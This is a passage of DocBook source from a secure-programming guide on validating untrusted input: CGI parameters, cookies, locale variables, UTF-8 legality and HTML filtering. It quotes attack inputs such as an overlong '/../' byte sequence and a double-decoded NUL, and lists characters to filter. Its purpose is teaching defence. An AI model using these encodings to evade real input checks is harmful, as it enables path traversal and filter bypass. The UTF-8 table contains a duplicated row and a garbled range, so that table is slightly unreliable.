Otherwise, the file must be treated as suspect.
|
||
</para>
|
||
|
||
<para>
|
||
If the directions in the file are supposed to be from an untrusted user,
|
||
then make sure that the inputs from the file are protected as describe
|
||
throughout this book.
|
||
In particular, check that values match the set of legal values, and that
|
||
buffers are not overflowed.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="web-apps">
|
||
<title>Web-Based Application Inputs (Especially CGI Scripts)</title>
|
||
|
||
<para>
|
||
Web-based applications (such as CGI scripts) run on some trusted
|
||
server and must get their
|
||
input data somehow through the web.
|
||
Since the input data generally come from untrusted users,
|
||
this input data must be validated.
|
||
Indeed, this information may have actually come from an untrusted third
|
||
party; see
|
||
<xref linkend="cross-site-malicious-content"> for more information.
|
||
For example, CGI scripts
|
||
are passed this information
|
||
through a standard set of environment variables and through standard input.
|
||
The rest of this text will specifically discuss CGI, because it's
|
||
the most common technique for implementing dynamic web content, but
|
||
the general issues are the same for most other dynamic web content techniques.
|
||
</para>
|
||
|
||
<para>
|
||
One additional complication is that many CGI inputs are provided in
|
||
so-called ``URL-encoded'' format, that is, some values are written in the
|
||
format %HH where HH is the hexadecimal code for that byte.
|
||
You or your CGI library must handle these inputs correctly by
|
||
URL-decoding the input and then checking
|
||
if the resulting byte value is acceptable.
|
||
You must correctly handle all values, including problematic
|
||
values such as %00 (NIL) and %0A (newline).
|
||
Don't decode inputs more than once, or input such as ``%2500''
|
||
will be mishandled (the %25 would be translated to ``%'', and the resulting
|
||
``%00'' would be erroneously translated to the NIL character).
|
||
</para>
|
||
|
||
<para>
|
||
CGI scripts are commonly attacked by including special characters in their
|
||
inputs; see the comments above.
|
||
</para>
|
||
|
||
<para>
|
||
Another form of data available to web-based applications are ``cookies.''
|
||
Again, users can provide arbitrary cookie values, so they cannot
|
||
be trusted unless special precautions are taken.
|
||
Also, cookies can be used to track users, potentially invading user privacy.
|
||
As a result, many users disable cookies, so if possible your web application
|
||
should be designed so that it does not require the use of cookies
|
||
(but see my later discussion for when you <emphasis>must</emphasis> authenticate
|
||
individual users).
|
||
I encourage you to avoid or limit the use of persistent cookies
|
||
(cookies that last beyond a current session), because they are easily abused.
|
||
Indeed, U.S. agencies are currently forbidden to use persistent cookies
|
||
except in special circumstances, because of the concern about
|
||
invading user privacy; see the
|
||
<ulink url="http://cio.gov/files/lewfinal062200.pdf">OMB guidance
|
||
in memorandum M-00-13 (June 22, 2000)</ulink>.
|
||
<!-- http://cio.gov/files/OMBCookies2.pdf
|
||
http://www.gao.gov/new.items/d01147r.pdf -->
|
||
Note that to use cookies, some browsers may insist that you
|
||
have a privacy profile (named p3p.xml on the root directory of the server).
|
||
</para>
|
||
|
||
<para>
|
||
Some HTML forms include client-side input checking
|
||
to prevent some illegal values; these are
|
||
typically implemented using Javascript/ECMAscript or Java.
|
||
This checking can be helpful for the user, since it can happen ``immediately''
|
||
without requiring any network access.
|
||
However, this kind of input checking is useless for security, because
|
||
attackers can send such ``illegal'' values directly to the web server
|
||
without going through the checks.
|
||
It's not even hard to subvert this; you don't have to write
|
||
a program to send arbitrary data to a web application.
|
||
In general, servers must perform all their own input checking
|
||
(of form data, cookies, and so on) because
|
||
they cannot trust clients to do this securely.
|
||
In short, clients are generally not ``trustworthy channels''.
|
||
See <xref linkend="trustworthy-channels">
|
||
for more information on trustworthy channels.
|
||
</para>
|
||
|
||
<para>
|
||
A brief discussion on input validation for those using Microsoft's
|
||
Active Server Pages (ASP) is available from
|
||
Jerry Connolly at
|
||
<ulink url="http://heap.nologin.net/aspsec.html">http://heap.nologin.net/aspsec.html</ulink>
|
||
<!-- ???
|
||
Jerry Connolly, jerry.connolly@EIRCOM.NET,
|
||
has guidelines for secure ASP pages - mentioned on SECPROG, 1 May 2001:
|
||
"I have written a small piece on the subject of input validation at:"
|
||
http://heap.nologin.net/aspsec.html
|
||
-->
|
||
</para>
|
||
|
||
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="other-inputs">
|
||
<title>Other Inputs</title>
|
||
|
||
<para>
|
||
Programs must ensure that all inputs are controlled; this is particularly
|
||
difficult for setuid/setgid programs because they have so many such inputs.
|
||
Other inputs programs must consider include the current directory,
|
||
signals, memory maps (mmaps), System V IPC, pending timers,
|
||
resource limits, the scheduling priority, and the umask (which determines
|
||
the default permissions of newly-created files).
|
||
Consider explicitly changing directories (using chdir(2)) to an appropriately
|
||
fully named directory at program startup.
|
||
<!--
|
||
From Bugtraq:
|
||
|
||
Re: trusting user-supplied data (was Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio)
|
||
From: wietse@porcupine.org (Wietse Venema)
|
||
Date: Wed, 24 Apr 2002 14:17:30 -0400 (EDT)
|
||
To: bugtraq@securityfocus.com
|
||
|
||
It is interesting to see that old problems with set-uid commands
|
||
keep coming back. Allow me to speed up the discussion a bit by
|
||
enumerating a few other channels for attack on set-uid commands.
|
||
|
||
A quick perusal of /usr/include/sys/proc.h reveals a large number
|
||
of "inputs" that a child process may inherit from a potentially
|
||
untrusted parent process.
|
||
|
||
The list includes, but is not limited to:
|
||
|
||
command-line array
|
||
environment array
|
||
open files
|
||
current directory
|
||
blocked/enabled signals
|
||
pending timers
|
||
resource limits
|
||
scheduling priority
|
||
All these sources of data can be, and have been, involved in attacks
|
||
on set-uid or set-gid commands (although I do not remember specific
|
||
details of pending timer attacks).
|
||
|
||
In addition to these "inheritance" attacks which are specific to
|
||
set-uid and set-gid commands, set-uid and set-gid commands can be
|
||
exposed to attacks via the /proc interface, and can be exposed to
|
||
ordinary data-driven attacks by feeding them nasty inputs.
|
||
|
||
Thus, set-uid and set-gid commands are exposed to a lot more attack
|
||
types than your average network service. The reason that network
|
||
attacks get more attention is simply that are more opportunities
|
||
to exploit them.
|
||
|
||
Wietse
|
||
|
||
-->
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="locale">
|
||
<title>Human Language (Locale) Selection</title>
|
||
|
||
<para>
|
||
As more people have computers and the Internet available to them, there
|
||
has been increasing pressure for programs
|
||
to support multiple human languages and cultures.
|
||
This combination of language and other cultural factors is usually called
|
||
a ``locale''.
|
||
The process of modifying a program so it can support multiple locales
|
||
is called ``internationalization'' (i18n), and the process of providing
|
||
the information for a particular locale to a program is called
|
||
``localization'' (l10n).
|
||
</para>
|
||
|
||
<para>
|
||
Overall, internationalization
|
||
is a good thing, but this process provides another opportunity
|
||
for a security exploit.
|
||
Since a potentially untrusted user provides information on the desired
|
||
locale, locale selection becomes another input that,
|
||
if not properly protected, can be exploited.
|
||
</para>
|
||
|
||
<sect2 id="how-locales-selected">
|
||
<title>How Locales are Selected</title>
|
||
|
||
<para>
|
||
In locally-run programs (including setuid/setgid programs),
|
||
locale information is provided by an environment
|
||
variable.
|
||
Thus, like all other environment variables, these values
|
||
must be extracted and checked against valid patterns before use.
|
||
</para>
|
||
|
||
<para>
|
||
For web applications, this information can be obtained from the web
|
||
browser (via the Accept-Language request header).
|
||
However, since not all web browsers properly pass this information
|
||
(and not all users configure their browsers properly),
|
||
this is used less often than you might think.
|
||
Often, the language requested in a web browser
|
||
is simply passed in as a form value.
|
||
Again, these values must be checked for validity before use, as with
|
||
any other form value.
|
||
</para>
|
||
|
||
<para>
|
||
In either case, locale information is
|
||
really just a special case of input discussed in the previous sections.
|
||
However, because this input is so rarely considered,
|
||
I'm discussing it separately.
|
||
In particular,
|
||
when combined with format strings (discussed later), user-controlled
|
||
strings can permit attackers to force other programs to run
|
||
arbitrary instructions,
|
||
corrupt data, and do other unfortunate actions.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="locale-support-mechanisms">
|
||
<title>Locale Support Mechanisms</title>
|
||
|
||
<para>
|
||
There are two major library interfaces for supporting locale-selected
|
||
messages on Unix-like systems,
|
||
one called ``catgets'' and the other called ``gettext''.
|
||
In the catgets approach, every string is assigned a unique number, which
|
||
is used as an index into a table of messages.
|
||
In contrast,
|
||
in the gettext approach, a string (usually in English) is used to
|
||
look up a table that translates the original string.
|
||
catgets(3) is an accepted standard
|
||
(via the X/Open Portability Guide, Volume 3 and
|
||
Single Unix Specification),
|
||
<!-- http://www.opengroup.org/onlinepubs/007908799/xsh/catopen.html -->
|
||
so it's possible your program uses it.
|
||
The ``gettext'' interface is not an official standard,
|
||
(though it was originally a UniForum proposal), but I believe it's the
|
||
more widely used interface
|
||
(it's used by Sun and essentially all GNU programs).
|
||
</para>
|
||
|
||
<para>
|
||
In theory, catgets should be slightly faster, but this is at best
|
||
marginal on today's machines, and the bookkeeping effort to keep
|
||
unique identifiers valid in catgets() makes the gettext() interface
|
||
much easier to use.
|
||
I'd suggest using gettext(), just because it's easier to use.
|
||
However, don't take my word for it; see GNU's documentation on gettext
|
||
(info:gettext#catgets) for a longer and more descriptive comparison.
|
||
</para>
|
||
|
||
<para>
|
||
The catgets(3) call (and its associated catopen(3) call)
|
||
in particular is vulnerable
|
||
to security problems, because the environment variable NLSPATH can be
|
||
used to control the filenames used to acquire internationalized messages.
|
||
The GNU C library ignores NLSPATH for setuid/setgid programs, which helps,
|
||
but that doesn't protect programs running on other implementations, nor
|
||
other programs (like CGI scripts) which don't ``appear'' to
|
||
require such protection.
|
||
</para>
|
||
|
||
<para>
|
||
The widely-used ``gettext'' interface is at least not
|
||
vulnerable to a malicious NLSPATH setting to my knowledge.
|
||
However, it appears likely to me that malicious settings of
|
||
LC_ALL or LC_MESSAGES could cause problems.
|
||
Also, if you use gettext's bindtextdomain() routine in its file cat-compat.c,
|
||
that does depend on NLSPATH.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="locale-legal-values">
|
||
<title>Legal Values</title>
|
||
|
||
<para>
|
||
For the moment, if you must permit untrusted users to set information on
|
||
their desired locales, make sure the provided internationalization information
|
||
meets a narrow filter that only permits legitimate locale names.
|
||
For user programs (especially setuid/setgid programs), these values
|
||
will come in via NLSPATH, LANGUAGE, LANG, the old LINGUAS, LC_ALL, and
|
||
the other LC_* values (especially LC_MESSAGES, but also including
|
||
LC_COLLATE, LC_CTYPE, LC_MONETARY, LC_NUMERIC, and LC_TIME).
|
||
For web applications, this user-requested set of language information
|
||
would be done via the Accept-Language request header or a form value
|
||
(the application should indicate the actual language setting of the
|
||
data being returned via the Content-Language heading).
|
||
You can check this value as part of your environment variable filtering if
|
||
your users can set your environment variables (i.e., setuid/setgid
|
||
programs) or as part of your input filtering (e.g., for CGI scripts).
|
||
The GNU C library "glibc" doesn't accept some values of LANG for
|
||
setuid/setgid programs (in particular anything with "/"),
|
||
but errors have been found in that filtering
|
||
(e.g., Red Hat released an update to fix this error in glibc
|
||
on September 1, 2000).
|
||
This kind of filtering isn't required by any standard, so you're
|
||
safer doing this filtering yourself.
|
||
I have not found any guidance on filtering language settings,
|
||
so here are my suggestions based on my own research into the issue.
|
||
</para>
|
||
|
||
<para>
|
||
First, a few words about the legal values of these settings.
|
||
Language settings are generally set using the standard tags defined
|
||
in IETF RFC 1766 (which uses two-letter country codes as its basic tag,
|
||
followed by an optional subtag separated by a dash; I've found that
|
||
environment variable settings use the underscore instead).
|
||
However, some find this insufficiently flexible, so three-letter country
|
||
codes may soon be used as well.
|
||
Also, there are two major not-quite compatible extended formats, the
|
||
X/Open Format and the CEN Format (European Community Standard);
|
||
you'd like to permit both.
|
||
Typical values include
|
||
``C'' (the C locale), ``EN'' (English''),
|
||
and ``FR_fr'' (French using the territory of France's conventions).
|
||
Also, so many people use nonstandard names that programs have had to develop
|
||
``alias'' systems to cope with nonstandard names
|
||
(for GNU gettext, see /usr/share/locale/locale.alias, and for X11, see
|
||
/usr/lib/X11/locale/locale.alias; you might need "aliases" instead of "alias");
|
||
they should usually be permitted as well.
|
||
Libraries like gettext() have to accept all these variants and find an
|
||
appropriate value, where possible.
|
||
One source of further information is FSF [1999];
|
||
another source is the li18nux.org web site.
|
||
A filter should not permit characters that aren't needed,
|
||
in particular ``/'' (which might permit escaping out of the trusted
|
||
directories) and ``..'' (which might permit going up one directory).
|
||
Other dangerous characters in NLSPATH
|
||
include ``%'' (which indicates substitution) and ``:''
|
||
(which is the directory separator); the documentation I have for other
|
||
machines suggests that some implementations may use them for other values,
|
||
so it's safest to prohibit them.
|
||
<!-- The Sun man page for "man locale" is disturbingly ambiguous on whether
|
||
or not these characters affect values other than NLSPATH -->
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="locale-bottom-line">
|
||
<title>Bottom Line</title>
|
||
|
||
<para>
|
||
In short, I suggest
|
||
simply erasing or re-setting the NLSPATH, unless you have a trusted user
|
||
supplying the value.
|
||
For the Accept-Language heading in HTTP (if you use it),
|
||
form values specifying the locale, and the environment variables
|
||
LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_* values listed
|
||
above,
|
||
filter the locales from untrusted users to permit null (empty) values or
|
||
to only permit values that match in total this regular expression
|
||
(note that I've recently added "="):
|
||
<programlisting width="61">
|
||
[A-Za-z][A-Za-z0-9_,+@\-\.=]*
|
||
</programlisting>
|
||
<!-- I permit plus. Standard locale name from li18nux.org
|
||
permits "=", so I added it; as of Feb 2002 they don't accept "+",
|
||
which is needed to suport the CEN format. -->
|
||
I haven't found any legitimate locale which doesn't match this pattern,
|
||
but this pattern does appear to protect against locale attacks.
|
||
Of course, there's no guarantee that there are messages available
|
||
in the requested locale,
|
||
but in such a case these routines will fall back to the default
|
||
messages (usually in English), which at least is not a security problem.
|
||
<!-- I developed this pattern, after looking at the GLIBC specs in
|
||
http://www.netppl.fi/~pp/glibc21/libc_8.html and the aliases on
|
||
Red Hat 6.2 -->
|
||
</para>
|
||
|
||
<para>
|
||
If you wish to be really picky, and only patterns that match li18nux's
|
||
locale pattern, you can use this pattern instead:
|
||
<programlisting width="61">
|
||
^[A-Za-z]+(_[A-Za-z]+)?
|
||
(\.[A-Z]+(\-[A-Z0-9]+)*)?
|
||
(\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
|
||
(,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$
|
||
</programlisting>
|
||
In both cases, these patterns use POSIX's extended (``modern'')
|
||
regular expression notation (see regex(3) and regex(7) on Unix-like systems).
|
||
</para>
|
||
|
||
<!-- See John Levon's Bugtraq post on July 26, 2000 re internationalization
|
||
and format strings.
|
||
-->
|
||
|
||
<para>
|
||
Of course, languages cannot be supported without a
|
||
standard way to represent their written symbols, which brings
|
||
us to the issue of character encoding.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="character-encoding">
|
||
<title>Character Encoding</title>
|
||
|
||
<sect2 id="character-encoding-intro">
|
||
<title>Introduction to Character Encoding</title>
|
||
|
||
<para>
|
||
For many years Americans have exchanged text using the ASCII character set;
|
||
since essentially all U.S. systems support ASCII,
|
||
this permits easy exchange of English text.
|
||
Unfortunately, ASCII is completely inadequate in handling the characters
|
||
of nearly all other languages.
|
||
For many years different countries have adopted different techniques for
|
||
exchanging text in different languages, making it difficult to exchange
|
||
data in an increasingly interconnected world.
|
||
</para>
|
||
|
||
<para>
|
||
More recently, ISO has developed ISO 10646,
|
||
the ``Universal Mulitple-Octet Coded Character Set (UCS).
|
||
UCS is a coded character set which
|
||
defines a single 31-bit value for each of all of the world's characters.
|
||
The first 65536 characters of the UCS (which thus fit into 16 bits)
|
||
are termed the ``Basic Multilingual Plane'' (BMP),
|
||
and the BMP is intended to cover nearly all of today's spoken languages.
|
||
The Unicode forum develops the Unicode standard, which concentrates on
|
||
the UCS and adds some additional conventions to aid interoperability.
|
||
Historically, Unicode and ISO 10646 were developed by competing groups,
|
||
but thankfully they realized that they needed to work together and they now
|
||
coordinate with each other.
|
||
</para>
|
||
|
||
<para>
|
||
If you're writing new software that handles internationalized characters,
|
||
you should be using ISO 10646/Unicode as your basis for handling
|
||
international characters.
|
||
However, you may need to process older documents in various older
|
||
(language-specific) character sets, in which case, you need to ensure that
|
||
an untrusted user cannot control the setting of another document's
|
||
character set (since this would significantly affect the document's
|
||
interpretation).
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="character-encoding-utf8">
|
||
<title>Introduction to UTF-8</title>
|
||
|
||
<para>
|
||
Most software is not designed to handle 16 bit or 32 bit characters,
|
||
yet to create a universal character set more than 8 bits was required.
|
||
Therefore, a special format called ``UTF-8'' was developed to encode these
|
||
potentially international
|
||
characters in a format more easily handled by existing programs and libraries.
|
||
UTF-8 is defined, among other places, in IETF RFC 2279, so it's a
|
||
well-defined standard that can be freely read and used.
|
||
UTF-8 is a variable-width encoding; characters numbered 0 to 0x7f (127)
|
||
encode to themselves as a single byte,
|
||
while characters with larger values are encoded into 2 to 6 bytes of
|
||
information (depending on their value).
|
||
The encoding has been specially designed to have the following
|
||
nice properties (this information is from the RFC and Linux utf-8 man page):
|
||
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
The classical US ASCII characters (0 to 0x7f) encode as themselves,
|
||
so files and strings which contain only 7-bit ASCII characters
|
||
have the same encoding under both ASCII and UTF-8.
|
||
This is fabulous for backward compatibility with the many existing
|
||
U.S. programs and data files.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
All UCS characters beyond 0x7f are encoded as a multibyte
|
||
sequence consisting only of bytes in the range 0x80 to 0xfd.
|
||
This means that no ASCII byte can appear as part of another
|
||
character. Many other encodings permit characters such as an
|
||
embedded NIL, causing programs to fail.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
It's easy to convert between UTF-8 and a 2-byte or 4-byte
|
||
fixed-width representations of characters (these are called
|
||
UCS-2 and UCS-4 respectively).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
The lexicographic sorting order of UCS-4 strings is preserved,
|
||
and the Boyer-Moore fast search algorithm can be used directly
|
||
with UTF-8 data.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
All possible 2^31 UCS codes can be encoded using UTF-8.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
The first byte of a multibyte sequence which represents
|
||
a single non-ASCII UCS character is always in the range
|
||
0xc0 to 0xfd and indicates how long this multibyte
|
||
sequence is. All further bytes in a multibyte sequence
|
||
are in the range 0x80 to 0xbf. This allows easy resynchronization;
|
||
if a byte is missing, it's easy to skip forward to the ``next''
|
||
character, and it's always easy to skip forward and back to the
|
||
``next'' or ``preceding'' character.
|
||
</para></listitem>
|
||
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
|
||
<para>
|
||
In short, the UTF-8 transformation format is becoming a dominant method
|
||
for exchanging international text information because it can support all of the
|
||
world's languages, yet it is backward compatible with U.S. ASCII files
|
||
as well as having other nice properties.
|
||
For many purposes I recommend its use, particularly when storing data
|
||
in a ``text'' file.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="utf8-security-issues">
|
||
<title>UTF-8 Security Issues</title>
|
||
|
||
|
||
<para>
|
||
The reason to mention UTF-8 is that
|
||
some byte sequences are not legal UTF-8, and
|
||
this might be an exploitable security hole.
|
||
UTF-8 encoders are supposed to use the ``shortest possible''
|
||
encoding, but naive decoders may accept encodings that are longer than
|
||
necessary.
|
||
Indeed, earlier standards permitted decoders to accept
|
||
``non-shortest form'' encodings.
|
||
The problem here is that this means that potentially dangerous
|
||
input could be represented multiple ways, and thus might
|
||
defeat the security routines checking for dangerous inputs.
|
||
The RFC describes the problem this way:
|
||
|
||
<blockquote>
|
||
<para>
|
||
Implementers of UTF-8 need to consider the security aspects of how
|
||
they handle illegal UTF-8 sequences. It is conceivable that in some
|
||
circumstances an attacker would be able to exploit an incautious
|
||
UTF-8 parser by sending it an octet sequence that is not permitted by
|
||
the UTF-8 syntax.
|
||
</para>
|
||
|
||
<para>
|
||
A particularly subtle form of this attack could be carried out
|
||
against a parser which performs security-critical validity checks
|
||
against the UTF-8 encoded form of its input, but interprets certain
|
||
illegal octet sequences as characters. For example, a parser might
|
||
prohibit the NUL character when encoded as the single-octet sequence
|
||
00, but allow the illegal two-octet sequence C0 80 (illegal because
|
||
it's longer than necessary) and interpret it
|
||
as a NUL character (00). Another example might be a parser which
|
||
prohibits the octet sequence 2F 2E 2E 2F ("/../"), yet permits the
|
||
illegal octet sequence 2F C0 AE 2E 2F.
|
||
</para>
|
||
</blockquote>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
A longer discussion about this is available at
|
||
Markus Kuhn's
|
||
<emphasis remap="it">UTF-8 and Unicode FAQ for Unix/Linux</emphasis> at
|
||
<ulink
|
||
url="http://www.cl.cam.ac.uk/~mgk25/unicode.html">http://www.cl.cam.ac.uk/~mgk25/unicode.html</ulink>.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="utf8-legal-values">
|
||
<title>UTF-8 Legal Values</title>
|
||
|
||
<para>
|
||
Thus, when accepting UTF-8 input, you need to check if the input is
|
||
valid UTF-8.
|
||
Here is a list of all legal UTF-8 sequences; any character
|
||
sequence not matching this table is not a legal UTF-8 sequence.
|
||
In the following table, the first column shows the various character
|
||
values being encoded into UTF-8.
|
||
The second column shows how those characters are encoded as binary values;
|
||
an ``x'' indicates where the data is placed (either a 0 or 1), though
|
||
some values should not be allowed because they're not the shortest possible
|
||
encoding.
|
||
The last row shows the valid values each byte can have
|
||
(in hexadecimal).
|
||
Thus, a program should check that every character meets one of the patterns
|
||
in the right-hand column.
|
||
A ``-'' indicates a range of legal values (inclusive).
|
||
Of course, just because a sequence is a legal UTF-8 sequence doesn't
|
||
mean that you should accept it (you still need to do all your other
|
||
checking), but generally you should check any UTF-8 data for UTF-8 legality
|
||
before performing other checks.
|
||
<table>
|
||
<title>Legal UTF-8 Sequences</title>
|
||
<tgroup cols="3">
|
||
<colspec colname="UCS">
|
||
<colspec colname="binary-range">
|
||
<colspec colname="hex">
|
||
<thead>
|
||
<row><entry>UCS Code (Hex)</entry><entry>Binary UTF-8 Format</entry><entry>Legal UTF-8 Values (Hex)</entry></row>
|
||
</thead>
|
||
<tbody>
|
||
<row><entry>00-7F</entry><entry>0xxxxxxx</entry><entry>00-7F</entry></row>
|
||
<row><entry>80-7FF</entry><entry>110xxxxx 10xxxxxx</entry><entry>C2-DF 80-BF</entry></row>
|
||
<row><entry>800-FFF</entry><entry>1110xxxx 10xxxxxx 10xxxxxx</entry><entry>E0 A0*-BF 80-BF</entry></row>
|
||
<row><entry>1000-FFFF</entry><entry>1110xxxx 10xxxxxx 10xxxxxx</entry><entry>E1-EF 80-BF 80-BF</entry></row>
|
||
<row><entry>10000-3FFFF</entry> <entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F0 90*-BF 80-BF 80-BF</entry></row>
|
||
<row><entry>40000-FFFFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F1-F3 80-BF 80-BF 80-BF</entry></row>
|
||
<row><entry>40000-FFFFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F1-F3 80-BF 80-BF 80-BF</entry></row>
|
||
<row><entry>100000-10FFFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F4 80-8F* 80-BF 80-BF</entry></row>
|
||
<row><entry>200000-3FFFFFF</entry><entry>111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>too large; see below</entry></row>
|
||
<row><entry>04000000-7FFFFFFF</entry><entry>1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>too large; see below</entry></row>
|
||
</tbody>
|
||
</tgroup>
|
||
</table>
|
||
</para>
|
||
<!-- From: http://www.unicode.org/unicode/uni2errata/UTF-8_Corrigendum.html -->
|
||
|
||
<para>
|
||
As I noted earlier, there are two standards for character sets,
|
||
ISO 10646 and Unicode, who have agreed to synchronize their
|
||
character assignments.
|
||
The definition of UTF-8 in ISO/IEC 10646-1:2000 and the IETF RFC
|
||
also currently support
|
||
five and six byte sequences to encode characters outside the range
|
||
supported by Uniforum's Unicode, but such values can't be used to
|
||
support Unicode characters and it's expected that a future version of
|
||
ISO 10646 will have the same limits.
|
||
<!-- http://www.unicode.org/unicode/reports/tr27/#relation -->
|
||
Thus, for most purposes the five and six byte UTF-8 encodings aren't legal,
|
||
and you should normally reject them (unless you have a special purpose
|
||
for them).
|
||
</para>
|
||
|
||
<para>
|
||
This is set of valid values is tricky to determine, and in fact
|
||
earlier versions of this document got some entries
|
||
wrong (in some cases it permitted overlong characters).
|
||
Language developers should include a function in their libraries
|
||
to check for valid UTF-8 values, just because it's so hard to get right.
|
||
</para>
|
||
|
||
<para>
|
||
I should note that in some cases, you might want to cut slack (or use
|
||
internally) the hexadecimal sequence C0 80. This is an overlong sequence
|
||
that, if permitted, can represent ASCII NUL (NIL). Since C and C++
|
||
have trouble including a NIL character in an ordinary string,
|
||
some people have taken
|
||
to using this sequence when they want to represent NIL as part of the
|
||
data stream; Java even enshrines the practice.
|
||
Feel free to use C0 80 internally while processing data, but technically
|
||
you really should translate this back to 00 before saving the data.
|
||
Depending on your needs, you might decide to be ``sloppy'' and accept
|
||
C0 80 as input in a UTF-8 data stream.
|
||
If it doesn't harm security, it's probably a good practice to accept this
|
||
sequence since accepting it aids interoperability.
|
||
</para>
|
||
|
||
<para>
|
||
Handling this can be tricky.
|
||
You might want to examine the C routines developed by Unicode to
|
||
handle conversions, available at
|
||
<ulink url="ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c">
|
||
ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c</ulink>.
|
||
It's unclear to me if these routines are open source software (the
|
||
licenses don't clearly say whether or not they can be modified), so
|
||
beware of that.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
|
||
<sect2 id="utf8-related-issues">
|
||
<title>UTF-8 Related Issues</title>
|
||
|
||
<para>
|
||
This section has discussed UTF-8, because it's the most popular
|
||
multibyte encoding of UCS, simplifying a lot of international text
|
||
handling issues.
|
||
However, it's certainly not the only encoding; there are other encodings,
|
||
such as UTF-16 and UTF-7, which have the same kinds of issues and
|
||
must be validated for the same reasons.
|
||
</para>
|
||
|
||
<para>
|
||
Another issue is that some phrases can be expressed in more than one
|
||
way in ISO 10646/Unicode.
|
||
For example, some accented characters can be represented as a single
|
||
character (with the accent) and also as a set of characters
|
||
(e.g., the base character plus a separate composing accent).
|
||
These two forms may appear identical.
|
||
There's also a zero-width space that could be inserted, with the
|
||
result that apparently-similar items are considered different.
|
||
Beware of situations where such hidden text could interfere with the program.
|
||
This is an issue that in general is hard to solve; most programs don't
|
||
have such tight control over the clients that they know completely how
|
||
a particular sequence will be displayed (since this depends on the
|
||
client's font, display characteristics, locale, and so on).
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="input-protection-cross-site">
|
||
<title>Prevent Cross-site Malicious Content on Input</title>
|
||
|
||
<para>
|
||
Some programs accept data from one untrusted user and pass that data
|
||
on to a second user; the second user's application may then process that
|
||
data in a way harmful to the second user.
|
||
This is a particularly common problem for web applications,
|
||
we'll call this problem ``cross-site malicious content.''
|
||
In short, you cannot accept input (including any form data)
|
||
without checking, filtering, or encoding it.
|
||
For more information, see
|
||
<xref linkend="cross-site-malicious-content">.
|
||
</para>
|
||
|
||
<para>
|
||
Fundamentally, this means that all web application input must be
|
||
filtered (so characters that can cause this problem are removed),
|
||
encoded (so the characters that can cause this problem are encoded in
|
||
a way to prevent the problem), or
|
||
validated (to ensure that only ``safe'' data gets through).
|
||
Filtering and validation should often be done at the input, but
|
||
encoding can be done either at input or output time.
|
||
If you're just passing the data through without analysis, it's probably
|
||
better to encode the data on input (so it won't be forgotten), but
|
||
if you're processing the data, there are arguments for encoding on
|
||
output instead.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="filter-html">
|
||
<title>Filter HTML/URIs That May Be Re-presented</title>
|
||
|
||
<para>
|
||
One special case where cross-site malicious content must be
|
||
prevented are web applications
|
||
which are designed to accept HTML or XHTML from one user, and then send it on
|
||
to other users
|
||
(see <xref linkend="cross-site-malicious-content"> for
|
||
more information on cross-site malicious content).
|
||
The following subsections discuss filtering this specific kind of input,
|
||
since handling it is such a common requirement.
|
||
</para>
|
||
|
||
<sect2 id="remove-html-tags">
|
||
<title>Remove or Forbid Some HTML Data</title>
|
||
|
||
<para>
|
||
It's safest to remove all possible (X)HTML tags so they cannot affect anything,
|
||
and this is relatively easy to do.
|
||
As noted above, you should already be identifying the list of legal
|
||
characters, and rejecting or removing those characters that aren't
|
||
in the list.
|
||
In this filter, simply don't include the following characters in
|
||
the list of legal characters: ``<'', ``>'', and ``&'' (and if
|
||
they're used in attributes, the double-quote character ``"'').
|
||
If browsers only operated according the HTML specifications, the ``>"''
|
||
wouldn't need to be removed, but in practice it must be removed.
|
||
This is because some browsers assume that the author of the page
|
||
really meant to put in an opening "<" and ``helpfully'' insert one -
|
||
attackers can exploit this behavior and use the ">" to create an
|
||
undesired "<".
|
||
<!-- CERT http://www.cert.org/tech_tips/malicious_code_mitigation.html -->
|
||
</para>
|
||
|
||
<para>
|
||
Usually the character set for transmitting HTML is
|
||
ISO-8859-1 (even when sending international text),
|
||
so the filter should also omit most control characters (linefeed and
|
||
tab are usually okay) and characters with their high-order bit set.
|
||
</para>
|
||
|
||
<para>
|
||
One problem with this approach is that it can really surprise users,
|
||
especially those entering international text if all international
|
||
text is quietly removed.
|
||
If the invalid characters are quietly removed without warning,
|
||
that data will be irrevocably lost and cannot be reconstructed later.
|
||
One alternative is forbidding such characters and sending error messages
|
||
back to users who attempt to use them.
|
||
This at least warns users, but doesn't give them the functionality
|
||
they were looking for.
|
||
Other alternatives are encoding this data or validating this data,
|
||
which are discussed next.
|
||
</para>
|
||
</sect2>
|
||
|
